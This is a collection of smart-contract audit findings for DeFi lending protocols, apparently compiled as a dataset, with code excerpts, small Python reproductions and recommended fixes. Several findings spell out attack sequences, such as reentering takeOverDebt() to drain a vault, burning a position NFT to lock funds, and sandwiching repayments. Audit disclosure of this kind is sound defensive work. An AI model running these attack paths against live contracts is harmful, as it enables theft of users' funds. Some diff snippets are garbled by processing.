Consider implementing a check to determine whether the repayment impact is zero or not before transferring ETH to such liquidators.\\n```\\nrequire(repayable0 != 0 || repayable1 != 0, "Zero repayment impact.") // @audit <-\\n_repay(repayable0, repayable1);\\n\\nslot0 = (slot0_ & SLOT0_MASK_POSITIONS) | SLOT0_DIRT;\\n\\npayable(callee).transfer(address(this).balance / strain);\\nemit Liquidate(repayable0, repayable1, incentive1, priceX128);\\n```\\n\\nAdditionally, contemplate setting a cap for the `strain` and potentially denoting it in basis points (BPS) instead of a fraction. This allows for more flexibility when users intend to repay a percentage lower than 100% but higher than 50% (e.g., 60%, 75%, etc.).
Users with small loans face the theft of their collateral without the bad debt being covered, leading to financial losses for the user. Additionally, this results in a potential amount of bad debt that can disrupt the vault's accounting.
```\\nassembly ("memory-safe") {\\n // // rest of code\\n liabilities0 := div(liabilities0, strain) // @audit rounds down to 0 <-\\n liabilities1 := div(liabilities1, strain) // @audit rounds down to 0 <-\\n // // rest of code\\n}\\n```\\n
Wrong auctionPrice used in calculating BPF to determine bond reward (or penalty)
medium
2. In the `_prepareTake()` function, the BPF is calculated using `vars.auctionPrice`, which is computed by the `_auctionPrice()` function.\\n```\\nfunction _prepareTake(\\n Liquidation memory liquidation_,\\n uint256 t0Debt_,\\n uint256 collateral_,\\n uint256 inflator_\\n ) internal view returns (TakeLocalVars memory vars) {\\n // rest of code// rest of code..\\n vars.auctionPrice = _auctionPrice(liquidation_.referencePrice, kickTime);\\n vars.bondFactor = liquidation_.bondFactor;\\n vars.bpf = _bpf(\\n vars.borrowerDebt,\\n collateral_,\\n neutralPrice,\\n liquidation_.bondFactor,\\n vars.auctionPrice\\n );\\n```\\n\\n3. The `_takeBucket()` function makes a judgment after `_prepareTake()`:\\n```\\n // cannot arb with a price lower than the auction price\\nif (vars_.auctionPrice > vars_.bucketPrice) revert AuctionPriceGtBucketPrice();\\n// if deposit take then price to use when calculating take is bucket price\\nif (params_.depositTake) vars_.auctionPrice = vars_.bucketPrice;\\n```\\n\\nSo the root cause of this issue is that, in a scenario where a user calls deposit take (`params_.depositTake == true`), BPF will be calculated based on `vars_.auctionPrice` instead of `bucketPrice`.\\n```\\n vars_ = _calculateTakeFlowsAndBondChange(\\n borrower_.collateral,\\n params_.inflator,\\n params_.collateralScale,\\n vars_\\n );\\n// rest of code// rest of code// rest of code// rest of code.\\n_rewardBucketTake(\\n auctions_,\\n deposits_,\\n buckets_,\\n liquidation,\\n params_.index,\\n params_.depositTake,\\n vars_\\n );\\n```\\n
In the case of Deposit Take calculate BPF using bucketPrice instead of auctionPrice .
Wrong `auctionPrice` used in calculating BPF, which subsequently influences the `_calculateTakeFlowsAndBondChange()` and `_rewardBucketTake()` functions, will result in bias.\\nFollowing the example of the Whitepaper (section 7.4.2 Deposit Take): BPF = 0.011644 * (1222.6515-1100 / 1222.6515-1050) = 0.008271889129. The collateral purchased is min{20, 20000/(1-0.00827) * 1100, 21000/(1-0.01248702772) * 1100}, which is 18.3334 units of ETH. Therefore, 18.3334 ETH are moved from the loan into the claimable collateral of bucket 1100, and the deposit is reduced to 0. Dave is awarded LPB in that bucket worth 18.3334 · 1100 · 0.008271889129 = 166.8170374 DAI. The debt repaid is 19914.99407 DAI\\n\\nBased on the current implementation: BPF = 0.011644 * (1222.6515-1071.77 / 1222.6515-1050) = 0.010175. TPF = 5/4 * 0.011644 - 1/4 * 0.010175 = 0.01201125. The collateral purchased is 18.368 units of ETH. The debt repaid is 20000 * (1-0.01201125) / (1-0.010175) = 19962.8974 DAI. Dave is awarded LPB in that bucket worth 18.368 · 1100 · 0.010175 = 205.58 DAI.\\nSo, Dave earns more rewards (38.703 DAI) than he should have.\\nAs the Whitepaper says: "the caller would typically have other motivations. She might have called it because she is Carol, who wanted to buy the ETH but not add additional DAI to the contract. She might be Bob, who is looking to get his debt repaid at the best price. She might be Alice, who is looking to avoid bad debt being pushed into the contract. She also might be Dave, who is looking to ensure a return on his liquidation bond."
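The discrepancy between the two BPF values quoted above can be reproduced with a quick sketch of the BPF formula (values taken from the whitepaper's section 7.4.2 example; floating point, so only approximate):

```python
bond_factor = 0.011644
NP, TP = 1222.6515, 1050.0            # neutral price, threshold price
bucket_price, auction_price = 1100.0, 1071.77

def bpf(price):
    # BPF = bondFactor * min(1, max(-1, (NP - price) / (NP - TP)))
    return bond_factor * min(1.0, max(-1.0, (NP - price) / (NP - TP)))

bpf_whitepaper = bpf(bucket_price)    # deposit take should use bucket price
bpf_current = bpf(auction_price)      # current code uses auction price

assert abs(bpf_whitepaper - 0.008271889129) < 1e-7
assert abs(bpf_current - 0.010175) < 1e-5
assert bpf_current > bpf_whitepaper   # kicker over-rewarded on deposit take
```

Since the auction price is always at or below the bucket price when a deposit take executes, the implementation's BPF is systematically at least as large as the whitepaper's, so the bias always favors the kicker.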
```\\nfunction _prepareTake(\\n Liquidation memory liquidation_,\\n uint256 t0Debt_,\\n uint256 collateral_,\\n uint256 inflator_\\n ) internal view returns (TakeLocalVars memory vars) {\\n // rest of code// rest of code..\\n vars.auctionPrice = _auctionPrice(liquidation_.referencePrice, kickTime);\\n vars.bondFactor = liquidation_.bondFactor;\\n vars.bpf = _bpf(\\n vars.borrowerDebt,\\n collateral_,\\n neutralPrice,\\n liquidation_.bondFactor,\\n vars.auctionPrice\\n );\\n```\\n
Incorrect implementation of `BPF` leads to kicker losing rewards in a `take` action
medium
The Bond Payment Factor (BPF) is the formula that determines the reward/penalty over the bond of a kicker in each `take` action. According to the whitepaper, the formula is described as:\\n```\\n// If TP < NP\\nBPF = bondFactor * min(1, max(-1, (NP - price) / (NP - TP)))\\n\\n// If TP >= NP\\nBPF = bondFactor (if price <= NP)\\nBPF = -bondFactor (if price > NP)\\n```\\n\\n```\\nfunction _bpf(\\n uint256 debt_,\\n uint256 collateral_,\\n uint256 neutralPrice_,\\n uint256 bondFactor_,\\n uint256 auctionPrice_\\n) pure returns (int256) {\\n int256 thresholdPrice = int256(Maths.wdiv(debt_, collateral_));\\n\\n int256 sign;\\n if (thresholdPrice < int256(neutralPrice_)) {\\n // BPF = BondFactor * min(1, max(-1, (neutralPrice - price) / (neutralPrice - thresholdPrice)))\\n sign = Maths.minInt(\\n 1e18,\\n Maths.maxInt(\\n -1 * 1e18,\\n PRBMathSD59x18.div(\\n int256(neutralPrice_) - int256(auctionPrice_),\\n int256(neutralPrice_) - thresholdPrice\\n )\\n )\\n );\\n } else {\\n int256 val = int256(neutralPrice_) - int256(auctionPrice_);\\n if (val < 0 ) sign = -1e18;\\n else if (val != 0) sign = 1e18; // @audit Sign will be zero when NP = auctionPrice\\n }\\n\\n return PRBMathSD59x18.mul(int256(bondFactor_), sign);\\n}\\n```\\n\\nThe issue is that the implementation of the `BPF` formula in the code doesn't match the specification, leading to the loss of rewards in that `take` action in cases where `TP >= NP` and `price = NP`.\\nAs shown in the above snippet, in cases where `TP >= NP` and `NP = price` (thus `val = 0`), the function won't set a value for `sign` (it will be `0` by default), so that will result in a computed `BPF` of `0` instead of `bondFactor`, which would be the correct `BPF`.
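The divergence in the `TP >= NP`, `price == NP` corner case can be made concrete with a small model of both branches (floating point instead of the contract's signed 59x18 fixed point, but the branch logic is the same):

```python
def bpf_implemented(bond_factor, np_, tp, price):
    # Mirrors the Solidity _bpf branch structure
    if tp < np_:
        sign = min(1.0, max(-1.0, (np_ - price) / (np_ - tp)))
    else:
        val = np_ - price
        if val < 0:
            sign = -1.0
        elif val != 0:
            sign = 1.0
        else:
            sign = 0.0   # bug: sign left at its default when price == NP
    return bond_factor * sign

def bpf_spec(bond_factor, np_, tp, price):
    # Whitepaper specification: BPF = bondFactor whenever price <= NP
    if tp < np_:
        return bond_factor * min(1.0, max(-1.0, (np_ - price) / (np_ - tp)))
    return bond_factor if price <= np_ else -bond_factor

# TP >= NP and price == NP: implementation pays 0, spec pays full bondFactor
assert bpf_implemented(0.01, 1000.0, 1100.0, 1000.0) == 0.0
assert bpf_spec(0.01, 1000.0, 1100.0, 1000.0) == 0.01
```

Everywhere else the two functions agree; the loss is confined to the exact-equality case, which is why the fix is simply collapsing the `val != 0` and `val == 0` non-negative cases into one `sign = 1e18` branch.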
Change the `_bpf` function to match the specification in order to fairly distribute the rewards in a `take` action:\\n```\\nfunction _bpf(\\n uint256 debt_,\\n uint256 collateral_,\\n uint256 neutralPrice_,\\n uint256 bondFactor_,\\n uint256 auctionPrice_\\n) pure returns (int256) {\\n int256 thresholdPrice = int256(Maths.wdiv(debt_, collateral_));\\n\\n int256 sign;\\n if (thresholdPrice < int256(neutralPrice_)) {\\n // BPF = BondFactor * min(1, max(// Remove the line below\\n1, (neutralPrice // Remove the line below\\n price) / (neutralPrice // Remove the line below\\n thresholdPrice)))\\n sign = Maths.minInt(\\n 1e18,\\n Maths.maxInt(\\n // Remove the line below\\n1 * 1e18,\\n PRBMathSD59x18.div(\\n int256(neutralPrice_) // Remove the line below\\n int256(auctionPrice_),\\n int256(neutralPrice_) // Remove the line below\\n thresholdPrice\\n )\\n )\\n );\\n } else {\\n int256 val = int256(neutralPrice_) // Remove the line below\\n int256(auctionPrice_);\\n if (val < 0 ) sign = // Remove the line below\\n1e18;\\n// Remove the line below\\n else if (val != 0) sign = 1e18;\\n// Add the line below\\n else sign = 1e18;\\n }\\n\\n return PRBMathSD59x18.mul(int256(bondFactor_), sign);\\n}\\n```\\n
The kicker will lose the rewards in that `take` action if the previous conditions are satisfied.\\nWhile the probability of this conditions to be met is not usual, the impact is the loss of rewards for that kicker and that may cause to lose part of the bond if later a `take` is performed with a negative `BPF`.
```\\n// If TP < NP\\nBPF = bondFactor * min(1, max(-1, (NP - price) / (NP - TP)))\\n\\n// If TP >= NP\\nBPF = bondFactor (if price <= NP)\\nBPF = -bondFactor (if price > NP)\\n```\\n
First pool borrower pays extra interest
medium
For any function in which the current interest rate is important in a pool, we compute interest updates by accruing with `_accruePoolInterest` at the start of the function, then execute the main logic, then update the interest state accordingly with `_updateInterestState`. See below a simplified example for ERC20Pool.drawDebt:\\n```\\nfunction drawDebt(\\n address borrowerAddress_,\\n uint256 amountToBorrow_,\\n uint256 limitIndex_,\\n uint256 collateralToPledge_\\n) external nonReentrant {\\n PoolState memory poolState = _accruePoolInterest();\\n\\n // rest of code\\n\\n DrawDebtResult memory result = BorrowerActions.drawDebt(\\n auctions,\\n deposits,\\n loans,\\n poolState,\\n _availableQuoteToken(),\\n borrowerAddress_,\\n amountToBorrow_,\\n limitIndex_,\\n collateralToPledge_\\n );\\n\\n // rest of code\\n\\n // update pool interest rate state\\n _updateInterestState(poolState, result.newLup);\\n\\n // rest of code\\n}\\n```\\n\\nWhen accruing interest in `_accruePoolInterest`, we only update the state if `poolState_.t0Debt != 0`. Most notably, we don't set `poolState_.isNewInterestAccrued`. 
See below simplified logic from _accruePoolInterest:\\n```\\n// check if t0Debt is not equal to 0, indicating that there is debt to be tracked for the pool\\nif (poolState_.t0Debt != 0) {\\n // rest of code\\n\\n // calculate elapsed time since inflator was last updated\\n uint256 elapsed = block.timestamp - inflatorState.inflatorUpdate;\\n\\n // set isNewInterestAccrued field to true if elapsed time is not 0, indicating that new interest may have accrued\\n poolState_.isNewInterestAccrued = elapsed != 0;\\n\\n // rest of code\\n}\\n```\\n\\nOf course before we actually update the state from the first borrow, the debt of the pool is 0, and recall that `_accruePoolInterest` runs before the main state changing logic of the function in `BorrowerActions.drawDebt`.\\nAfter executing the main state changing logic in `BorrowerActions.drawDebt`, where we update state, including incrementing the pool and borrower debt as expected, we run the logic in `_updateInterestState`. Here we update the inflator if either `poolState_.isNewInterestAccrued` or `poolState_.debt == 0`.\\n```\\n// update pool inflator\\nif (poolState_.isNewInterestAccrued) {\\n inflatorState.inflator = uint208(poolState_.inflator);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n// if the debt in the current pool state is 0, also update the inflator and inflatorUpdate fields in inflatorState\\n// slither-disable-next-line incorrect-equality\\n} else if (poolState_.debt == 0) {\\n inflatorState.inflator = uint208(Maths.WAD);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n}\\n```\\n\\nThe problem here is that since there was no debt at the start of the function, `poolState_.isNewInterestAccrued` is false and since there is debt now at the end of the function, `poolState_.debt == 0` is also false. As a result, the inflator is not updated. Updating the inflator here is paramount since it effectively marks a starting time at which interest accrues on the borrowers debt. 
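The two-branch structure can be modeled to show that a first borrow falls through both conditions, leaving the inflator timestamp stale (a simplified sketch; field names follow the Solidity, values are illustrative):

```python
def update_interest_state(state, is_new_interest_accrued, debt_after, now, pool_inflator):
    # Simplified mirror of _updateInterestState's inflator branches
    if is_new_interest_accrued:
        state["inflator"] = pool_inflator
        state["inflatorUpdate"] = now
    elif debt_after == 0:
        state["inflator"] = 1.0
        state["inflatorUpdate"] = now
    # A FIRST borrow hits NEITHER branch: debt was 0 before execution
    # (so isNewInterestAccrued stayed False) and is non-zero after.

DAY = 86_400
state = {"inflator": 1.0, "inflatorUpdate": 0}   # pool funded at t = 0

# First borrow happens 100 days later:
update_interest_state(state, is_new_interest_accrued=False,
                      debt_after=21_000, now=100 * DAY, pool_inflator=1.0)

# inflatorUpdate is still 0, so interest accrues as if the loan had been
# open since pool creation, 100 days earlier.
assert state["inflatorUpdate"] == 0
```

With the recommended `debtBeforeExecution == 0` condition added, the second branch would fire and `inflatorUpdate` would be stamped with the borrow time instead.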
Since we don't update the inflator, the borrowers debt effectively started accruing interest at the time of the last inflator update, which is an arbitrary duration.\\nWe can prove this vulnerability by modifying `ERC20PoolBorrow.t.sol:testPoolBorrowAndRepay` to skip 100 days before initially drawing debt:\\n```\\nfunction testPoolBorrowAndRepay() external tearDown {\\n // check balances before borrow\\n assertEq(_quote.balanceOf(address(_pool)), 50_000 * 1e18);\\n assertEq(_quote.balanceOf(_lender), 150_000 * 1e18);\\n\\n // @audit skip 100 days to break test\\n skip(100 days);\\n\\n _drawDebt({\\n from: _borrower,\\n borrower: _borrower,\\n amountToBorrow: 21_000 * 1e18,\\n limitIndex: 3_000,\\n collateralToPledge: 100 * 1e18,\\n newLup: 2_981.007422784467321543 * 1e18\\n });\\n\\n // rest of code\\n}\\n```\\n\\nUnlike the result without skipping time before drawing debt, the test fails with output logs being off by amounts roughly corresponding to the unexpected interest.
When checking whether the debt of the pool is 0 to determine whether to reset the inflator, it should not only check whether the debt is 0 at the end of execution, but also whether the debt was 0 before execution. To do so, we should cache the debt at the start of the function and modify the `_updateInterestState` logic to be something like:\\n```\\n// update pool inflator\\nif (poolState_.isNewInterestAccrued) {\\n inflatorState.inflator = uint208(poolState_.inflator);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n// if the debt in the current pool state is 0, also update the inflator and inflatorUpdate fields in inflatorState\\n// slither-disable-next-line incorrect-equality\\n// @audit reset inflator if no debt before execution\\n} else if (poolState_.debt == 0 || debtBeforeExecution == 0) {\\n inflatorState.inflator = uint208(Maths.WAD);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n}\\n```\\n
First borrower always pays extra interest, with losses depending upon time between adding liquidity and drawing debt and amount of debt drawn.\\nNote also that there's an attack vector here in which the liquidity provider can intentionally create and fund the pool a long time before announcing it, causing the initial borrower to lose a significant amount to interest.
```\\nfunction drawDebt(\\n address borrowerAddress_,\\n uint256 amountToBorrow_,\\n uint256 limitIndex_,\\n uint256 collateralToPledge_\\n) external nonReentrant {\\n PoolState memory poolState = _accruePoolInterest();\\n\\n // rest of code\\n\\n DrawDebtResult memory result = BorrowerActions.drawDebt(\\n auctions,\\n deposits,\\n loans,\\n poolState,\\n _availableQuoteToken(),\\n borrowerAddress_,\\n amountToBorrow_,\\n limitIndex_,\\n collateralToPledge_\\n );\\n\\n // rest of code\\n\\n // update pool interest rate state\\n _updateInterestState(poolState, result.newLup);\\n\\n // rest of code\\n}\\n```\\n
Function `_indexOf` will cause a settlement to revert if `auctionPrice > MAX_PRICE`
medium
In ERC721 pools, when a settlement occurs and the borrower still have some fraction of collateral, that fraction is allocated in the bucket with a price closest to `auctionPrice` and the borrower is proportionally compensated with LPB in that bucket.\\nIn order to calculate the index of the bucket closest in price to `auctionPrice`, the `_indexOf` function is called. The first line of that function is outlined below:\\n```\\nif (price_ < MIN_PRICE || price_ > MAX_PRICE) revert BucketPriceOutOfBounds();\\n```\\n\\nThe `_indexOf` function will revert if `price_` (provided as an argument) is below `MIN_PRICE` or above `MAX_PRICE`. This function is called from `_settleAuction`, here is a snippet of that:\\n```\\nfunction _settleAuction(\\n AuctionsState storage auctions_,\\n mapping(uint256 => Bucket) storage buckets_,\\n DepositsState storage deposits_,\\n address borrowerAddress_,\\n uint256 borrowerCollateral_,\\n uint256 poolType_\\n) internal returns (uint256 remainingCollateral_, uint256 compensatedCollateral_) {\\n\\n // // rest of code\\n\\n uint256 auctionPrice = _auctionPrice(\\n auctions_.liquidations[borrowerAddress_].referencePrice,\\n auctions_.liquidations[borrowerAddress_].kickTime\\n );\\n\\n // determine the bucket index to compensate fractional collateral\\n> bucketIndex = auctionPrice > MIN_PRICE ? _indexOf(auctionPrice) : MAX_FENWICK_INDEX;\\n\\n // // rest of code\\n}\\n```\\n\\nThe `_settleAuction` function first calculates the `auctionPrice` and then it gets the index of the bucket with a price closest to `bucketPrice`. 
If `auctionPrice` turns out to be greater than `MAX_PRICE`, then the `_indexOf` function will revert and the entire settlement will fail.\\nIn certain types of pools where one asset has an extremely low market price and the other is valued very high, the resulting prices at an auction can be so high that it is not rare to see an `auctionPrice > MAX_PRICE`.\\nThe `auctionPrice` variable is computed from `referencePrice` and decreases over time until 72 hours have passed. Also, `referencePrice` can be much higher than `MAX_PRICE`, as outlined in `_kick`:\\n```\\nvars.referencePrice = Maths.min(Maths.max(vars.htp, vars.neutralPrice), MAX_INFLATED_PRICE);\\n```\\n\\nThe value of `MAX_INFLATED_PRICE` is exactly 50 * `MAX_PRICE`, so a `referencePrice` greater than `MAX_PRICE` is entirely possible.\\nIn auctions where `referencePrice` is greater than `MAX_PRICE` and the auction is settled within a short time frame, `auctionPrice` will also be greater than `MAX_PRICE`, and that will cause the entire transaction to revert.
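The guard interaction can be sketched with a toy model. The constants and the price-to-index mapping below are illustrative stand-ins, not Ajna's real Fenwick math; only the bounds check and the `MIN_PRICE`-only guard mirror the snippets above.

```python
MIN_PRICE = 10**5                     # illustrative stand-ins for the real bounds
MAX_PRICE = 10**9
MAX_FENWICK_INDEX = 7388

def index_of(price):
    # mirrors: if (price_ < MIN_PRICE || price_ > MAX_PRICE) revert BucketPriceOutOfBounds()
    if price < MIN_PRICE or price > MAX_PRICE:
        raise ValueError("BucketPriceOutOfBounds")
    return MAX_FENWICK_INDEX - 1      # placeholder for the real price-to-index math

def settle_bucket_index(auction_price):
    # mirrors: auctionPrice > MIN_PRICE ? _indexOf(auctionPrice) : MAX_FENWICK_INDEX
    return index_of(auction_price) if auction_price > MIN_PRICE else MAX_FENWICK_INDEX

assert settle_bucket_index(MIN_PRICE // 2) == MAX_FENWICK_INDEX  # low side is guarded
try:
    settle_bucket_index(MAX_PRICE * 50)   # referencePrice may reach 50 * MAX_PRICE
    reverted = False
except ValueError:
    reverted = True
assert reverted                            # the whole settlement tx would revert
```

Note how only the `MIN_PRICE` side is guarded before calling `index_of`, which is exactly the asymmetry the finding describes.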
It's recommended to change the affected line of `_settleAuction` in the following way:\\n```\\n// Remove the line below\\n bucketIndex = auctionPrice > MIN_PRICE ? _indexOf(auctionPrice) : MAX_FENWICK_INDEX;\\n// Add the line below\\n if(auctionPrice < MIN_PRICE){\\n// Add the line below\\n bucketIndex = MAX_FENWICK_INDEX;\\n// Add the line below\\n } else if (auctionPrice > MAX_PRICE) {\\n// Add the line below\\n bucketIndex = 1;\\n// Add the line below\\n } else {\\n// Add the line below\\n bucketIndex = _indexOf(auctionPrice);\\n// Add the line below\\n }\\n```\\n
When the above conditions are met, the auction won't be able to settle until `auctionPrice` drops below `MAX_PRICE`.\\nIn ERC721 pools with a high difference in asset valuations, there are no low-probability prerequisites and the impact is a violation of the system design, as well as potential losses for the kicker of that auction, so the severity is set to high.
```\\nif (price_ < MIN_PRICE || price_ > MAX_PRICE) revert BucketPriceOutOfBounds();\\n```\\n
Adversary can reenter takeOverDebt() during liquidation to steal vault funds
high
First we'll walk through a high-level breakdown of the issue to have as context for the rest of the report:\\nCreate a custom token that allows them to take control of the transaction and to prevent liquidation\\nFund UniV3 LP with target token and custom token\\nBorrow against LP with target token as the hold token\\nAfter some time the position becomes liquidatable\\nBegin liquidating the position via repay()\\nUtilize the custom token during the swap in repay() to gain control of the transaction\\nUse control to reenter into takeOverDebt() since it lacks a nonReentrant modifier\\nLoan is now open on a secondary address and closed on the initial one\\nTransaction resumes (post swap) on repay()\\nFinish repayment and refund all initial LP\\nThe position still exists on the new address\\nAfter some time the position becomes liquidatable\\nLoan is liquidated and attacker is paid more LP\\nVault is at a deficit due to refunding LP twice\\nRepeat until the vault is drained of target token\\nLiquidityManager.sol#L279-L287\\n```\\n_v3SwapExactInput(\\n v3SwapExactInputParams({\\n fee: params.fee,\\n tokenIn: cache.holdToken,\\n tokenOut: cache.saleToken,\\n amountIn: holdTokenAmountIn,\\n amountOutMinimum: (saleTokenAmountOut * params.slippageBP1000) /\\n Constants.BPS\\n })\\n```\\n\\nThe control transfer happens during the swap to UniV3. Here, when the custom token is transferred, it gives control back to the attacker, which can be used to call takeOverDebt().\\nLiquidityBorrowingManager.sol#L667-L672\\n```\\n _removeKeysAndClearStorage(borrowing.borrower, params.borrowingKey, loans);\\n // Pay a profit to a msg.sender\\n _pay(borrowing.holdToken, address(this), msg.sender, holdTokenBalance);\\n _pay(borrowing.saleToken, address(this), msg.sender, saleTokenBalance);\\n\\n emit Repay(borrowing.borrower, msg.sender, params.borrowingKey);\\n```\\n\\nThe reason the reentrancy works is that the actual borrowing storage state isn't modified until AFTER the control transfer. 
This means that the position state is fully intact for the takeOverDebt() call, allowing it to seamlessly transfer to another address while behaving completely normally. After the repay() call resumes, _removeKeysAndClearStorage is called with the now-deleted borrowingKey.\\nKeys.sol#L31-L42\\n```\\nfunction removeKey(bytes32[] storage self, bytes32 key) internal {\\n uint256 length = self.length;\\n for (uint256 i; i < length; ) {\\n if (self.unsafeAccess(i).value == key) {\\n self.unsafeAccess(i).value = self.unsafeAccess(length - 1).value;\\n self.pop();\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nThe unique characteristic of removeKey is that it doesn't revert if the key doesn't exist. This allows "removing" keys from an empty array without reverting, which lets the repay call finish successfully.\\nLiquidityBorrowingManager.sol#L450-L452\\n```\\n //newBorrowing.accLoanRatePerSeconds = oldBorrowing.accLoanRatePerSeconds;\\n _pay(oldBorrowing.holdToken, msg.sender, VAULT_ADDRESS, collateralAmt + feesDebt);\\n emit TakeOverDebt(oldBorrowing.borrower, msg.sender, borrowingKey, newBorrowingKey);\\n```\\n\\nNow we can see how this creates a deficit in the vault. When taking over an existing debt, the user is only required to provide enough hold token to cover any fee debt plus any additional collateral to pay fees for the newly transferred position. This means that the user isn't providing any hold token to back the existing LP.\\nLiquidityBorrowingManager.sol#L632-L636\\n```\\n Vault(VAULT_ADDRESS).transferToken(\\n borrowing.holdToken,\\n address(this),\\n borrowing.borrowedAmount + liquidationBonus\\n );\\n```\\n\\nOn the other hand, repay transfers the LP-backing funds from the vault. Since the same position is effectively liquidated twice, it will withdraw twice as much hold token as was originally deposited, and no new LP funds are added when the position is taken over. 
This causes a deficit in the vault, since other users' funds are being withdrawn from it.
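The double payout can be modeled with a minimal toy (not the actual Wagmi contracts; all names and amounts are illustrative). The key features it reproduces are the payout-before-state-clear ordering, the reentrant takeover, and the removeKey-style delete that tolerates a missing key:

```python
class ToyVault:
    def __init__(self, balance):
        self.balance = balance
    def transfer_out(self, amount):
        assert self.balance >= amount
        self.balance -= amount

class ToyManager:
    def __init__(self, vault):
        self.vault = vault
        self.positions = {}               # borrowingKey -> borrowedAmount
    def open(self, key, amount):
        self.positions[key] = amount
    def take_over(self, old_key, new_key):
        # lacks nonReentrant: callable while repay() is mid-flight
        self.positions[new_key] = self.positions.pop(old_key)
    def repay(self, key, attacker_hook=None):
        amount = self.positions[key]
        self.vault.transfer_out(amount)   # funds leave the vault first
        if attacker_hook:
            attacker_hook(self)           # control transfer (the UniV3 swap)
        self.positions.pop(key, None)     # removeKey-style: no revert if gone

vault = ToyVault(balance=2_000)
mgr = ToyManager(vault)
mgr.open("keyA", 1_000)
# attacker reenters during the swap and moves the debt to a second address
mgr.repay("keyA", attacker_hook=lambda m: m.take_over("keyA", "keyB"))
# the "same" position survives under keyB and can be repaid/liquidated again
mgr.repay("keyB")
assert vault.balance == 0                 # vault paid out twice for one loan
```

Moving the `positions.pop` before the external call (checks-effects-interactions) or adding the reentrancy guard breaks the attack in this model, matching the recommendation.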
Add the `nonReentrant` modifier to `takeOverDebt()`
Vault can be drained
```\\n_v3SwapExactInput(\\n v3SwapExactInputParams({\\n fee: params.fee,\\n tokenIn: cache.holdToken,\\n tokenOut: cache.saleToken,\\n amountIn: holdTokenAmountIn,\\n amountOutMinimum: (saleTokenAmountOut * params.slippageBP1000) /\\n Constants.BPS\\n })\\n```\\n
Creditor can maliciously burn UniV3 position to permanently lock funds
high
NonfungiblePositionManager\\n```\\nfunction ownerOf(uint256 tokenId) public view virtual override returns (address) {\\n return _tokenOwners.get(tokenId, "ERC721: owner query for nonexistent token");\\n}\\n```\\n\\nWhen querying a nonexistent token, ownerOf will revert. Assuming the NFT is burnt, we can see how every repayment path is lost.\\nLiquidityManager.sol#L306-L308\\n```\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Increase liquidity and transfer liquidity owner reward\\n _increaseLiquidity(cache.saleToken, cache.holdToken, loan, amount0, amount1);\\n```\\n\\nIf the user is being liquidated or repaying themselves, the above lines are called for each loan. This causes all calls of this nature to revert.\\nLiquidityBorrowingManager.sol#L727-L732\\n```\\n for (uint256 i; i < loans.length; ) {\\n LoanInfo memory loan = loans[i];\\n // Get the owner address of the loan's token ID using the underlyingPositionManager contract.\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Check if the owner of the loan's token ID is equal to the `msg.sender`.\\n if (creditor == msg.sender) {\\n```\\n\\nThe only other option to recover funds would be for each of the other lenders to call for an emergency withdrawal. The problem is that this pathway will also always revert: it cycles through each loan, querying ownerOf() for each token, which as established reverts. The final result is that once this happens, there is no possible way to close the position.
I would recommend storing each initial creditor when a loan is opened. Add try-catch blocks to each `ownerOf()` call. If the call reverts then use the initial creditor, otherwise use the current owner.
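A minimal sketch of that mitigation (a toy model, not the contract code; names like `creditor_for` are illustrative): record the creditor at loan-open time and fall back to it when the `ownerOf()` lookup reverts.

```python
class BurntNFT(Exception):
    """Stand-in for the ERC721 revert on a nonexistent token."""

position_owners = {1: "lender.eth"}     # tokenId -> current NFT owner

def owner_of(token_id):
    # mirrors ERC721: reverts "owner query for nonexistent token" if burnt
    if token_id not in position_owners:
        raise BurntNFT("ERC721: owner query for nonexistent token")
    return position_owners[token_id]

initial_creditors = {1: "lender.eth"}   # stored when the loan was opened

def creditor_for(token_id):
    try:
        return owner_of(token_id)           # normal path: live NFT
    except BurntNFT:
        return initial_creditors[token_id]  # fallback keeps repayment working

assert creditor_for(1) == "lender.eth"
del position_owners[1]                  # creditor maliciously burns the NFT
assert creditor_for(1) == "lender.eth"  # repayment is no longer bricked
```

In Solidity the equivalent would be a `try underlyingPositionManager.ownerOf(...)` block with the stored initial creditor as the `catch` fallback.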
Creditor can maliciously lock all funds
```\\nfunction ownerOf(uint256 tokenId) public view virtual override returns (address) {\\n return _tokenOwners.get(tokenId, "ERC721: owner query for nonexistent token");\\n}\\n```\\n
No slippage protection during repayment due to dynamic slippage params and easily influenced `slot0()`
high
The absence of slippage protection can be attributed to two key reasons. Firstly, the `sqrtPrice` is derived from `slot0()`, which can be easily manipulated:\\n```\\n function _getCurrentSqrtPriceX96(\\n bool zeroForA,\\n address tokenA,\\n address tokenB,\\n uint24 fee\\n ) private view returns (uint160 sqrtPriceX96) {\\n if (!zeroForA) {\\n (tokenA, tokenB) = (tokenB, tokenA);\\n }\\n address poolAddress = computePoolAddress(tokenA, tokenB, fee);\\n (sqrtPriceX96, , , , , , ) = IUniswapV3Pool(poolAddress).slot0(); //@audit-issue can be easily manipulated\\n }\\n```\\n\\nThe calculated `sqrtPriceX96` is used to determine the amounts for restoring liquidity and the number of holdTokens to be swapped for saleTokens:\\n```\\n(uint256 holdTokenAmountIn, uint256 amount0, uint256 amount1) = _getHoldTokenAmountIn(\\n params.zeroForSaleToken,\\n cache.tickLower,\\n cache.tickUpper,\\n cache.sqrtPriceX96,\\n loan.liquidity,\\n cache.holdTokenDebt\\n );\\n```\\n\\nAfter that, `saleTokenAmountOut` is obtained based on the sqrtPrice via QuoterV2.\\nThen, the slippage params are calculated: `amountOutMinimum: (saleTokenAmountOut * params.slippageBP1000) / Constants.BPS })`. However, `saleTokenAmountOut` is a dynamic number calculated from the current state of the blockchain, based on the calculations mentioned above. This means the swap will always satisfy the `amountOutMinimum`.\\nAs a result, if the user's repayment is sandwiched (front-run), the repayer's profit is decreased until the repayment satisfies the restored liquidity.\\nA Proof of Concept (PoC) demonstrates the issue with comments. 
